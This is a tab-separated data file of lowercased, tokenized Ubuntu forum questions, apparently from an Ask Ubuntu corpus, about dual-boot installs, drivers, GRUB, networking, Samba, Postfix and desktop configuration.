toss the motherboard .
103691	problem with ubuntu installation alongside windowsxp	i tried to install ubuntu on my windowsxp machine as a second os . i do not get the option `` install ubuntu alongside them '' when i go through the guided installation process from the live-cd . any idea or help on what i could do ? further information : i have three primary partitions : ( without title ) 78mb fat recovery ( d : ) 10 gb ntfs ( c : ) 136.47 gb ntfs and one extended partition ( as a logical drive ) : - mediadirect 2.5 gb fat 32 there is no unpartitioned disk space left my drive is a basic drive and i ran chkdsk ( no errors found ) but the problem persists
103697	can i copy firefox cookies and flash cookies from windows to use in ubuntu ?	can i copy firefox cookies and flash cookies from windows to use in ubuntu ?
103700	ubuntu grub screen problems	i 'm running windows xp and ubuntu 11.10 as a dual boot , however , at the grub screen , the only way to boot ubuntu is to select recovery mode and then select resume normal boot . if i select the proper way to boot ubuntu however , the screen goes black and then after a while goes to a screen with some text that looks like a terminal screen . how do i make it so this does not happen ? i just installed it using the disk i had made back when i dual booted my other computer awhile back , and i just partioned my disks in the setup . when i 'm in the text mode i think it is fully functional because when i go ctrl + alt + f1 it gives me the option to login , but its all text based .
103701	why is gedit so laggy when editing through ftp ?	i use gedit to edit files on my media temple server , but it 's so laggy . other editors i 've used do n't have this problem . saving takes a long time , and gedit usually freezes up for a bit during this . navigating through a file is also slow and problematic .
103705	how can i install docky 2.2 ?	i heard that docky 2.2 has volume control ingetrated . how can i update my docky to 2.2 on ubuntu 11.10 ?
103706	gtk-warning can not open display	i run ubuntu 10.04 and i 'm trying to disable suspend and hibernate mode so i typed this : code : sudo gedit /usr/share/polkit-1/actions/org.freedesktop.upower.policy but i get this error : code : gtk-warning ** : can not open display : anyone know what the problem is ?
103708	ubuntu dash is blank . how do i get the apps back ?	i restarted ubuntu , and now the dash is empty . how do i get it back ?
103711	how to remove my computer icon , home folder , and trash bin from desktop	in a previous version of ubuntu , i used gconf-editor to add icons to the desktop , but now gconf looks confusing . how can i remove the my computer , home folder , and trash icons from my desktop ?
103712	installing basic gnome gui on server	i 'm trying to install a very minimal gnome environment on an ubuntu server running on minimal server hardware ( i.e . no graphics card ) behind a kvm switch . yes , i know that 's generally frowned upon . i read the wiki 's server gui notes , but it only mentions how to install the entire desktop environment , not just the core . so i ran sudo apt-get install gnome-core xinit xorg then rebooted . afterwards , it came back up to a terminal login , which is fine . i logged in and then tried running startx , but received the error : ( ee ) failed to load module `` ast '' ( module does not exist ) ( ee ) open /dev/fb0 : no such file or directory ( ee ) vesa ( 0 ) : v_bios address 0x5f6e0 out of range ( ee ) screen ( s ) found , but none have a usable configuration . fatal error : no screens found i read here and here that i should try deleting my /etc/x11/xorg.conf and rebooting , but the file /etc/x11/xorg.conf does not exist on my system . what else do i need to do to resolve this error and get gnome running ?
103716	how can i set up postfix without the need of a relayhost ?	in /etc/postfix/main.cf i have [ relayhost = smtp.someisp.no ] and everything works fine . i have to use this relayhost since my isp has closed port 25 . my isp tells me that if i dont want to use their relayhost i have to configure my mailserver to use a ssl port like port 465 . then i can remove the relayhost option . do anyone know where i do this like which files to edit and is this possible if i dont set up my server as a dns server ?
103719	dual boot : access mac os hd folders from ubuntu	i did it ! ! ! i 'm right now writting from ubuntu 11.10 installed in my macbook pro using dual boot ! ! ! the only thing is , how can i now access my mac folders ? from ubuntu if i try to open music , documents or any of those folders related to the mac user i get the following : [ the folder contents could not be displayed . you do not have the permissions necessary to view the contents of `` music '' ] i can access them if i run nautilus from root ( gksudo nautilus ) , but i would like to just be able to browse those folders . thanks !
103721	samba share issues	ok , so i have added two users to samba , user1 and user2 . i 've also added a couple of different shares , with different path locations . i am connecting from a windows xp machine . user1 can connect to all shares with the proper username and password . when trying to connect to those same shares with user2 's usernames and password , i ca n't connect to any share , only the home directory . can someone lend some assistance to this ?
103723	running xen on ubuntu-server 11.10	i 'm trying to run xen on ubuntu server 11.10 . i tried following the wiki , but it 's a bit obsolete , so i tried following a blog post . everything seemed to be going well , until i ran virsh version , which shows : compiled against library : libvir 0.9.2 using library : libvir 0.9.2 using api : xen 3.0.1 can not extract running xen hypervisor version oddly , when i booted , i manually selected the xen kernel ... but then a second grub menu appeared , requiring i select a `` normal '' ubuntu kernel . also , when i ran grep vmx /proc/cpuinfo , it showed my cpu ( an intel xeon e3-1230 ) had vt support . but now when i run it , it does n't show anything , which is weird because intel 's docs explicitly say it has vt support . how do i determine what went wrong and fix it ? is there an official guide on installing xen on ubuntu 11.10 ?
103727	horizontal scrolling checked but still does n't work	i have an asus n82jv with touchpad configured for single tap , double tap and two-finger vertical scroll . even though i have the `` enable horizantal scrolling '' in the mouse configurations it still does n't work . any idea how to fix ? thanks .
103729	accessing external hdd	so i have 2 external hdd 's mounted . when user1 is logged in , access to those external drives are ok . when i log off user1 and log in as user2 , i cant access those external drives . this is kinda related to another question i have . i think its permissions but have tried a few things to no avail . suggestions are welcome and appreciated ! here 's the other issue , which seems related . related issue here
103731	recover firefox sync data ?	i recently reinstalled ubuntu . i opened firefox preferences and tried to add my sync account . i selected the option saying i did n't have my device with me , and proceeded . next i entered my details and saw that something called a 'recovery key ' was needed . i did n't remember seeing this before ( and i 've been using sync since it was called weave ) , so i clicked `` do n't remember '' and then `` generate new key '' . it said it was succesful and that it would start syncing . but none of my data came through . i started getting worried . i searched the internet and found this http : //support.mozilla.org/en-us/kb/replace % 20your % 20sync % 20information . so it looks like all my years of data online has been removed without warning me . sure , i should have backed up the data ( and in fact i do have an older backup ) , but this still should n't happen without warning me . it 's a big shock . has this happened to anyone else ? is there anything i can do about this ?
103738	how do i give permission to a basic user to access read , execute contents of only one partition but not delete or ad files	how do i give permission to a basic user to access read , execute contents of only one partition but not delete or ad files ... i have 3 partitions , and the one i want to give access is dev/sda4 . every time i try to mount disc it requires authentication .
103739	`` failed to start network default '' error when trying to juju bootstrap an lxc environment	one @ onezero : ~/juju $ juju bootstrap 2012-02-13 07:32:26,586 info bootstrapping environment 'sample ' ( type : local ) ... 2012-02-13 07:32:26,587 info checking for required packages ... 2012-02-13 07:32:26,981 info starting networking ... error : failed to start network default error : internal error network is already in use by interface virbr0 command ' [ 'virsh ' , 'net-start ' , 'default ' ] ' returned non-zero exit status 1 2012-02-13 07:32:27,248 error command ' [ 'virsh ' , 'net-start ' , 'default ' ] ' returned non-zero exit status 1 with sudo one @ onezero : ~/juju $ sudo juju bootstrap 2012-02-13 07:34:18,504 info bootstrapping environment 'sample ' ( type : local ) ... 2012-02-13 07:34:18,504 info checking for required packages ... 2012-02-13 07:34:18,894 info starting networking ... 2012-02-13 07:34:18,931 info starting zookeeper ... [ errno 2 ] no such file or directory : '/etc/zookeeper/conf/environment' 2012-02-13 07:34:18,932 error [ errno 2 ] no such file or directory : '/etc/zookeeper/conf/environment' how do i fix this error ?
103741	which path variable is valid for launchers ?	in my .bashrc file i have defined path variable , but it seems it 's not validated by desktop launchers where should i define path variable so that launchers can pick it up ?
103742	change default command options	when i enter command ls i see a list of files and directories in current directory , the list displayed is quite annoying . rather , i like to execute ls command with -1 option like ls -1 my question is how to change default behavior of ls command such that it will always execute with -1 option . i.e how to display files and directories in one column with ls command . thanks .
103743	broadcom 4312 wireless not working on an hp dv6-1245 dx	i have installed ubuntu 10.04 on my hp dv6-1245 dx notebook and i do not have any wifi ( it worked perfectly in windows vista and 7 ) . i have followed a lot of instructions found on net but still not able to get internet . here is the outcome of lspci : $ sudo lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation ich9m/m-e sata ahci controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 00:1f.6 signal processing controller : intel corporation 82801i ( ich9 family ) thermal subsystem ( rev 03 ) 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) i have used ndiswrapper and have installed it , as well as the windows drivers for broadcom , no change .
103746	error , then black screen after wubi 11.10	i have this laptop with windows 7 : http : //www.geeks.com/details.asp ? invtid=lx-pxn02-147-dt i installed ubuntu 11.10 via wubi and when i boot intu ubuntu using the boot up menu , i get this error : try ( hd 0,0 ) ntfs5 : no wubildr try ( hd 0,1 ) ntfs5 : no wubildr try ( hd 0,2 ) ntfs5 : error : `` prefix '' not set . then , i get a blank purple screen , which turns completely black and stays there . what should i do ?
103748	geforce gtx 550 ti and linux ?	when i try to install any form of linux , including ubuntu , kubuntu , and even mint the installation gives me an error because if my pci device which is my gpu . this error flashes over and over again , and then times out . i want to dual boot windows 7 and ubuntu but ubuntu simply fails to install.. whats wrong ? i know the problem is because of my gpu because it will install with on-board graphics..
103755	is there a equivalent sofware to everything search engine ( windows ) on ubuntu ?	imo , everything search engine is the best desktop search software on windows and i wonder if there is an equivalent software on ubuntu ?
103757	ushare getting a segmentation fault on ubuntu 11.10	i 've just installed ( from the repository ) ushare on my ubuntu server 11.10 to play my media files on my ps3 . when trying to execute it , i get this error : interface eth0 is down . recheck ushare 's configuration and try again ! ushare ( version 1.1a ) , a lightweight upnp a/v and dlna media server . benjamin zores ( c ) 2005-2007 , for geexbox team . see http : //ushare.geexbox.org/ for updates . listening on telnet port 1337 initializing upnp subsystem ... starting in dlna compliant profile ... upnp mediaserver listening on 192.168.1.5:49200 sending upnp advertisement for device ... listening for control point connections ... building metadata list ... looking for files in content directory : /home/media/content/videos/ segmentation fault eth0 is up and running . this is my config file : # /etc/ushare.conf # edit this file with 'dpkg-reconfigure ushare' # configuration file for ushare # ushare upnp friendly name ( default is 'ushare ' ) . ushare_name=ushare # interface to listen to ( default is eth0 ) . # ex : ushare_iface=eth1 ushare_iface=eth0 # port to listen to ( default is random from iana dynamic ports range ) # ex : ushare_port=49200 ushare_port=49200 # port to listen for telnet connections # ex : ushare_telnet_port=1337 ushare_telnet_port=1337 # directories to be shared ( space or csv list ) . # ex : ushare_dir=/dir1 , /dir2 ushare_dir=/home/media/content/videos/ # use to override what happens when iconv fails to parse a file name . # the default ushare behaviour is to not add the entry in the media list # this option overrides that behaviour and adds the non-iconv'ed string into # the media list , with the assumption that the renderer will be able to # handle it . devices like noxon 2 have no problem with strings being passed # as is . ( umlauts for all ! ) # # options are true/yes/1 for override and anything else for default behaviour ushare_override_iconv_err=yes # enable web interface ( yes/no ) ushare_enable_web=yes # enable telnet control interface ( yes/no ) ushare_enable_telnet=yes # use xbox 360 compatibility mode ( yes/no ) ushare_enable_xbox=no # use dlna profile ( yes/no ) # this is needed for playstation3 to work ( among other devices ) ushare_enable_dlna=yes any ideas ? ? thanks !
103759	many process named `` su-to-root '' appeared on my system monitor , is my computer owned ?	two process named gksu and two process named su-to-root appeared on my system monitor , is my computer owned ? how can i be sure , and if this true , how can i rip out the intruder without full system reinstall ? where and which logs i should check , and looking exactly for what ? i use firestarter , but events logger appear empty ( ? ) ... what is another bad sign ... thanks so much for any help . ubuntu 11.10 edit : i forgot to mention a sh process running too my 50-default.conf ... . # first some standard log files . log by facility . # auth , authpriv . * /var/log/auth.log * . * ; auth , authpriv.none -/var/log/syslog # cron . * /var/log/cron.log # daemon . * -/var/log/daemon.log kern . * -/var/log/kern.log # lpr . * -/var/log/lpr.log m ail . * -/var/log/mail.log # user . * -/var/log/user.log ... and the process sh keeps reborning ! !
103765	how do i stop server mounted usb drives showing a dialogue on thin clients	i 'm running ubuntu 10.04 64bit desktop on my server with ltsp5.2 and 10 workstations . everytime i put a cd or usb disk into the server it shows up with an error on all the workstations saying 'unable to mount ' is there a way to stop these messages from showing on thin clients ?
103766	how to map ctrl+q key press to ctrl+c event ?	how can the ctrl+q key combination be mapped to the ctrl+c event ? my keyboard is mapped to programmer-dvorak and i would like to have the ctrl+x , ctrl+c and ctrl+v events to be mapped to ctrl+ ' , ctrl+q , ctrl+j key presses respectively . mac osx has something called dvorak - qwerty that does this . you may also want to try dvorak - qwerty which uses dvorak for typing but qwerty for keyboard shortcuts like â ( command ) a . this can be handy if you 've memorized common command combinations like âx , c , v ( for cut , copy , paste ) , etc by location on your keyboard , so far , i 've tried a combination of xbindkeys with xdotool without any luck . # dvorak cut '' xdotool key -- delay 0 -- clearmodifiers ctrl+x '' m:0x4 + c:52 control + apostrophe # dvorak copy '' xdotool key -- delay 0 -- clearmodifiers ctrl+c '' m:0x4 + c:53 control + q # dvorak paste '' xdotool key -- delay 0 -- clearmodifiers ctrl+v '' m:0x4 + c:54 control + j i 've also tried via xkb with the following entries . // ctrl+ ' for cut interpret apostrophe + ctrl { action = redirect ( key= < ab05 > , modifiers=control ) ; } ; // ctrl+q for copy interpret q + ctrl { action = redirect ( key= < ad08 > , modifiers=control ) ; } ; // ctrl+j for paste interpret j + ctrl { action = redirect ( key= < ab09 > , modifiers=control ) ; } ; but that does n't work either .
103772	how to update ubuntu 's python with latest version from source ?	i 'm using ubuntu 11.10 . the python 2.7.2 provided has a bug that has been corrected in the latest 2.7.2 sources from the python repository . what is the recommended way to replace the ubuntu provided python with the python from source ? or put another way , how do i `` update '' the ubuntu-provided one ? ideally , i would just be able to create new .deb ( s ) that `` update '' the python2.7/python2.7-dev provided by ubuntu .
103775	gnome shell theme not changing ?	i recently tried to install the hope gtk3 theme , to change the looks of the default gnome 3 . it 's working properly , except for one thing : the top panel 's theme is not changing . so , how exactly do you change it ?
103776	what can i accomplish with a juju charm ?	i have seen this question : what is a juju charm ? i have more questions . which services can be deployed using juju charm ? can lxc-containers be deployed using juju charm ? are juju charms like smf ( service management facility like in solaris ) ? ( so , a charm tells juju how to manage a service ) @ sergey answer )
103777	search plugin for marlin , nautilus	i installed marlin file browser in ubuntu 11.10 but it have no search box is there any plugin to do it ? is there any alternate search box for nautilus ?
103783	could i install dd-wrt on a linux box	i want to have a linux-box with two eth card , and i want to use it as the route . i know there is dd-wrt which runs for all kinds of router . i am wondering whether could i install dd-wrt on my linux-box ? if not , is there some route application i could use ? thanks
103787	how do i change my @ ubuntu.com email alias ?	i have an ubuntu.com email address which was aliased to an email account i no longer use ( or own ) . i 'd like to point to to my gmail account now . who maintains these aliases or is there a way for me to change it myself ?
103794	unable to load pages in web browsers	using ubuntu 11.10 , i am having a problem browsing web pages . i tested my connection by pinging different sites . all of them reply to me , but my browsers do not work . the problem is not specific to one browser , as i have tested both firefox and chromium . this is the wget output when run in terminal : wget ubuntu.com resolving ubuntu.com ... 91.189.94.156 connecting to ubuntu.com|91.189.94.156|:80 no error is raised . what do i have to do ? thanks for every bodies answers . my problem was from ipv6 activat . open the firefox browser and type : about : config press accept button with the text i 'll be careful , i promiss ! then enter ipv6 in filter field . just one entry remain in list with text network.dns.disableipv6 . right click on this and press toggle . the value field must be true . after , take logout and logon again . now test again ! i did the above stream.it got solve for some minutes but the problem started again . so now i have not the page loading in my ubuntu .
103795	how to convert .lit files in other formats ?	i 've changed my e-reader and i want to convert my .lit files in other supported formats ( azw , txt , pdf , html , doc , docx , jpeg , gif , png or bmp ) thanks
103797	does banshee have a log of files deleted from the drive from within banshee ?	does banshee have a log of files deleted from the drive from within banshee ? apparently all these dupes i was seeing in my library and deleting were n't dupes , but a bug : ( https : //bugzilla.gnome.org/show_bug.cgi ? id=632465 so i have a lot of missing files and want to know which ones are missing/i 've recently deleted from within banshee to see if i can somehow recover them , as i have no way of knowing this now other than by trying to play the fly and banshee falling silent and skipping it . it 's still listed though , since banshee still has it its imported files db .
103800	shutdown or restart only logs me out	my workstation at work is running 11.10 ( lightdm ) . shutting down or restarting has always worked up till last week . my workstation is generally left on through the week and shutdown at weekends . when i click either restart or shutdown , it just logs me out . is there any logs i can see that will point to errors ? what might cause this ? i have n't got auto login checked ( as one answer suggested ) . sudo halt and sudo reboot both work ... so why does n't the ui buttons ?
103802	can i access debian server through bluetooth pan via ssh access	hi i have an old pentium machine which i want to turn into a server . i have got a debian 6 squeeze distro with me . my machine doesnot have a lan port on it . i do n't want to give access to my server over internet . i only want to use it as a web server for internal testing . my question is can i connect it over bluetooth pan network as i have got a bluetooth dongle through which i used to connect my desktop to laptop similarly to a lan network ? if so how ?
103803	periodic short freezes after new fresh installation	i have the problem that my screen and input freezes for approx 1 sec about every 30 sec . i have googled a bit and found that this symptom has showed up with several different actual causes . for example something repated to upower . however , none of the solutions i have found have worked in my case . so i 'm asking , what is a good starting point to try to locate the error ? i would think , for example , that something would appear in dmesg every time the problem happens that would indicate the source of the problem . but nothing there ... ideas where to look anyone ? btw , i have an intel graphics chip : 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 )
103804	am i able to install the codelite plugins package without uninstalling codelite ?	i have the most recent stable version installed ( version 3.5.5375 ) but every time i try to apt-get install the codlite plugins it advises it will remove the codelite install .
103807	how can i change the icon size on lubuntu 's desktop ?	i want to change the icons on the lubuntu desktop .
103810	how to ssh from host ( win7 ) to guest ( ubuntu server 10.04 )	i have recently installed ubuntu server 10.04 lts on my machine that has windows 7 ultimate . i would like to run the vm graphicless and access it through ssh from windows 7 . my machine is connected to a router wirelessly and with dhcp . i tried different combinations ( nat/bridged ) but still i am unable to access the guest with putty . it either says connection refused or it simply hangs without anyh other output . while i try to connect to the ssh daemon my vm is started and i am logged in with a normal user . my ubuntu setup was just installed and i have n't configured anything on it except done an apt-get update & & apt-get upgrade also the open-ssh daemon is started and running . i do n't have ics on my windows machine so normally nothing should interfere with the ports . i try to connect to 127.0.0.1:22 with the normal user name for the ubuntu setup and it wo n't connect !
103813	how can i change my email address on launchpad ?	i want to add a new mail address to launchpad . i was able to add a new address and i confirmed the address , but i ca n't use it for example for mailing lists . i ca n't set it as contact address . is that not possible ?
103814	how can i upgrade my dell mini from version 8.04 ?	i have a dell mini with version 8.04 . i can not figure out how to upgrade it to any version of ubuntu i have bought . i can not even boot from a disc . the upgrade manager tries , but always fails . my system works great . you might say if it works , leave it alone , but still why not ?
103816	how can i install a package in gnu octave ?	how can i install a package in gnu octave ? i have tried , for example , with the splines-package after downloading it in my home directory with : octave1 > > pkg install splines-1.0.7.tar.gz i get the following error message : could n't create installation directory /usr/share/octave/packages/3.2/splines-1.0.7 : permission denied error : called from `pkg > copy_files ' in file /usr/share/octave/3.2.4/m/pkg/pkg.m near line 1431 , column 7 error : called from : error : /usr/share/octave/3.2.4/m/pkg/pkg.m at line 756 , column 5 error : /usr/share/octave/3.2.4/m/pkg/pkg.m at line 287 , column 7
103820	ubuntu installation help	i have a packard bell easynote tj65 . yesterday i tried to install ubuntu using wubi , but after 3 hours , the installation was not finished . cpu : intel® pentium core™ t4300 - 2,10ghz memory : 4096 mb ddr2 hard drive : 500 gb sata wi-fi : atheros ar5b93 ethernet : broadcom netlink gigabit ethernet graphics : intel gma 4500m audio : conexant cx-20561-15z
103823	reconfigure unity-2d after downgrade	i tried enabling hud in unity following the instructions at http : //techhamlet.com/2012/01/how-to-install-the-new-hud-in-ubuntu-12-04-and-11-10/ , but when i had finished , i found that it does n't work for me since i 'm using unity 2d ( my fault , i should have checked it first ) . now , i 've downgraded to the normal ( supported ) version of unity , but unity-2d is n't starting . when i try to run unity-2d-launcher , it exits with the following output : unity-2d-launcher : [ fatal ] settings schema 'com.canonical.unity.launcher ' is not installed ... and unity-2d-panel gives : unity-2d-panel : [ fatal ] settings schema 'com.canonical.unity.panel ' is not installed i tried using sudo apt-get install -- reinstall unity-2d but it still does n't work . how do i reconfigure unity-2d to make it start working , or do i need to manually do sudo apt-get remove and then sudo apt-get install ?
103831	virtual box guest addition missing and ca n't be downloaded	i downloaded virtualbox from ubuntu software center and install there windows xp 32 bit . now when i 'm trying to install guest additions it 's saying that guest addition is missing and is asking download it . when i press 'download ' it 's saying that it ca n't download because the link is missing .
103832	headphones are plugged in and sound still comes out of speakers	i have an asus k60ij laptop , i am new to linux and was forced to come to linux when my windows os crashed on me and the reinstall disks would not work , every time i plug in my headphones i have sound coming from my speakers as well , i messed with sound settings under output i see analog output and analog headphones seems no matter what one i pick sound comes from both . i also installed gnome-alsa mixer and alsamixergui and pulse audio control as well as pulse audio mixer and pulse audio volume control , i have messed with all of them and none of them will fix the issue or give me a run around on manipulating the sound card . i am running ubuntu 11.10x32 please can someone help me ? i ask in irc but everyone ignores me for some reason and if they do help they are not successful . thank you in advance .
103834	how do i force configuration of partially installed packages ?	whenever i run aptitude safe-upgrade , i get this output : the following partially installed packages will be configured : cups gconf2 ufw update-manager no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 2 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . how can i configure the four mentioned packages ? i tried dpkg-reconfigure gconf2 but that fails with /usr/sbin/dpkg-reconfigure : gconf2 is broken or not fully installed
103835	securely automount encrypted drive at user login	an encrypted /home directory gets mounted automatically for me when i log in . i have a second internal hard drive that i 've formatted and encrypted with disk utility . i want it to be automatically mounted when i login , just like my encrypted /home directory is . how do i do this ? there are several very similar questions here , but the answers do n't apply to my situation . it might be best to close/merge my question here and edit the second one below , but i think it may have been abandoned ( and therefore never to be marked as accepted ) . this solution is n't a secure method , it circumvents the encryption . this one requires editing fstab , which necessitates entering an additional password at boot . it 's not automatic like mounting /home . this question is very similar , but does not apply to an encrypted drive . the solution wo n't work for my needs . here is one but it 's for ntfs drives , mine is ext4 . i can re-format and re-encrypt the second drive if a solution requires this . i 've got all the data backed up elsewhere .
103838	will canonical still be splitting revenue from ubuntu one music store in 12.04 ?	with the release of 12.04 , ubuntu will be moving back to rhythmbox as the default music player . will canonical still give banshee a share of revenue from ubuntu one music store purchases made using banshee after 12.04 ? will canonical still take a share of revenue from banshee 's amazon plugin ? i know that in previous releases ( 11.04 and 11.10 ) , they shared revenue with both rhythmbox and banshee . i 'd be interested in knowing what happened in 10.04 and 10.10 .
103844	how to customize the initrd embedded in or coming with the kernel image	i would like to add some tools and not just kernel modules into the initrd ( initramfs-based ) . now i 'm aware of how to unpack and how to pack the initrd with cpio and have even written a hook for /etc/initramfs-tools/hooks in the past to integrate a third-party kernel module . however , while the available script libraries seem to be geared towards the integration of modules , none of them seems to be for integration of other entities ( in particular programs and their dependencies ) . what options do i have to automate the integration of some useful tools for recovery into the initrd ? i 'm talking about the `` rescue '' system that the system drops into if it is unable to mount the root drive given to it by the boot loader . please note that i do n't want the squashfs approach as is used for live-cds because for the issue at hand it will be by far sufficient to include some relatively small tools that aid in recovery of the system ( when it gets stuck in initrd and ca n't boot further ) . also , the machines when they run into the issue that we have had in the past tend to boot into the rescue system , but there a few tools are missing to kick the system back on trail ...
103846	how do i restore /etc/init.d/nginx after removal ?	i have installed nginx with apt-get . than i removed it . i also manually removed /etc/init.d/nginx . after i installed it again with apt-get , it did n't create /etc/init.d/nginx . so service nginx does n't work anymore . is is possible to force apt-get to create this file again ?
103851	mouse occasionally stops responding	i installed ubuntu 11.10 on my sony vaio a month ago . since then everything was ok but recently my mouse stops responding occasionally . what could be the problem and how would i fix it ?
103854	how to start 3 apps at the same time	i found an interesting project ( skypathy ) what this project does is runs skype via empathy ( sky-pathy ) with the help from a pidgin plugin that also works with empathy pidgin-skype i installed everything like so sudo add-apt-repository ppa : skype-wrapper/ppa sudo apt-get update sudo apt-get install skype skype-wrapper empathy pidgin-skype sudo apt-get remove sni-qt then run the skype first . then skype-wrapper give permissions and empathy i am making an .desktop file but do n't now how to start them all one after the other . and the sudo apt-get remove sni-qt should remove my skype icon from the unity-panel bit it doesn't.this is how my .desktop file looks like [ desktop entry ] version=1.0 name=skypathy genericname=im client x-gnome-fullname=skypathy full internet messaging comment=chat on google talk , facebook , skype , msn and many other chat services exec=skype skype-wrapper empathy icon=/home/username/desktop/skypathy.png startupnotify=false terminal=false type=application categories=gnome ; gtk ; network ; instantmessaging ; i also tried to change the `` exec= '' to a scripts that runs the apps skype & & skype-wrapper & & empathy but when it runs skype it wont go to skype-wrapper until skype is closed same as when runnin skype-wrapper it wont go to empathy until skype-wrapper is closed this is the icon i used ( just for fun )
103855	partition is misaligned by 3072 bytes ... pavilion dv7-6199us	i bought a new hp pavilion dv7-6199us . in the past on all my computers i have always used ubuntu primarily and i keep a version of windows in case i need something that i ca n't do easily in linux . i have always just re-sized the main windows partition to leave enough space for linux to run with no problems . i would leave the remaining space for linux on the disk with no partition or anything , just unused space . then i would run ubuntu 's installer and tell it to use the unused space . never a problem , ubuntu would create partitions there however it wanted to . this time i did all this , but when i resized the partition in windows the remaining space was labelled unusable by linux and windows . so i said ok no problem i booted ubuntu 11.10 from usb and i just deleted the whole windows partition and created a 492 gb partition to install windows on again . after doing this the disk management utility in ubuntu said the following error : `` warning : the partition is misaligned by 3072 bytes . this may result in very poor performance . repartitioning is suggested . '' do i keep going ? is this just a screwy error that i can ignore ? i ca n't handle bad performance issues . i 'm not very experienced with the command line so gui-only unless you can really be patient with me , please .
103859	how do i improve streaming performance with my setup ?	i 'm experiencing freezing and glitches while watching streams online , especially hds . ex . http : //www.en.aljazeerasport.tv/ which is flawless on windows and glitchy / freezing on ubuntu current setup ~ ubuntu 11.10 64 hardware http : //pastebin.com/nfgrwytk
103861	how to make firefox use chromify-osd ?	i understand that chrome has chromify-osd , an extension that lets it use notify-osd for notifications . is it possible to customize it such that it works for firefox as well ?
103864	unable to run apps requiring opengl support	recently upgraded my onboard nvidea graphics chip with an ati radeon sapphire x800xl pcie graphics card . ever since i am unable to run stellarium . i get the error `` this system does not support opengl '' . the only thing that has changed since i last run stellarium ( other than the weekly updates ) is the new card . i have tried other fixes like this one to no avail . i have also tried to re-install the ati plugin and catalyst drivers in software center with no change . i remember once finding the list of nvidea drivers available and being able to switch between them , where is that box again ?
103868	/boot driver filling up due to kernels on 11.10 and unable to update	any clean solutions for cleaning up the /boot mount ? it seems to fill with kernels but i 'd like to make sure the overall package management knows they are gone . do you really need to remove one by one ? thanks
103869	gnome session fallback with compiz - > alt click on panel	as described here is is possible to enable the window snapping by activating compiz . however this also disables the alt+ ability on the panel . so after activating compiz it is not possible anymore to add or remove something from/to the panel . is there a permanent workaround other then temporarily running metacity -- replace when you want to modify the panel ? i would like to have both the window snapping and the alt- ability .
103878	why is the server kernel not install on a server ? ( 10.04.3 )	i installed ubuntu-10.04.3-server-amd64.iso why is the desktop kernel installed ? ~ # cat /etc/motd linux dbxp015 2.6.32-33-generic # 70-ubuntu smp thu jul 7 21:13:52 utc 2011 x86_64 gnu/linux ubuntu 10.04.3 lts i know i can install the server kernel sudo apt-get install linux-headers-server linux-image-server linux-server why is the server kernel not install on a server ? edit : my other machine came up with the proper kernel , there must be somthing wrong with my iso . i dont remeber where i downloaded it from ... but i do remeber why i didnt d/l it form ubuntu.com i can not wget ubuntu 10.04 server from this page . http : //www.ubuntu.com/download/server/download the direct url for this download link works in the browser , but with wget it gives me 11.10 server . tldr this link works in the browser , not from wget . wget http : //www.ubuntu.com/start-download ? distro=server & bits=64 & release=lts
103882	how do i activate docker ?	i 'm using openbox ( because the gnome3 gnome shell and unity were both making me c-r-a-z-y , not because i do n't have hardware ) and want to install a dock . i 've heard good things about docker and docky both , but i do n't know how to activate either . i 'm running gnome-do already and installed docker . now what ?
103884	is there a way to get the wallpaper to `` tile '' instead of `` center '' ?	i switch between 2 screens on my laptop : a 1280x1024 monitor and the built-in 1366x768 lcd . i have a 1366x1024 wallpaper i 'd like to use , but i want it locked to the top-left corner ( like windows does with a tiled wallpaper ) . when i use 'tile ' on ubuntu 11.10 and the image is larger than my screen , it centers it . is there any way to get it to lock the wallpaper to the top ( without stretching it ) ?
103886	dual boot : ubuntu using 3 times more battery than leopard ?	just a quick question : i have noticed when i boot into ubuntu my battery goes empty faster , and checking the `` time left '' option in leopard and ubuntu it says mac will last 3 hours where ubuntu will last 1 . is that normal ? ? ? ? ?
103887	unable to install ubuntu 11.10 - cd with downloaded iso file does n't work	i tried to install ubuntu 11.10 on my dell studio xps running with windows 7 professional . following the recommended installation steps found on the internet , i first downloaded the iso file , burned it on cd and restarted the system from this burned cd forced by pressing f12 . nothing happened ( black screen with blinking cursor ) and after a while normal windows 7 startup appeared . finally i tried the 32bit as well as 64bit version with the same disappointing result . what am i missing ?
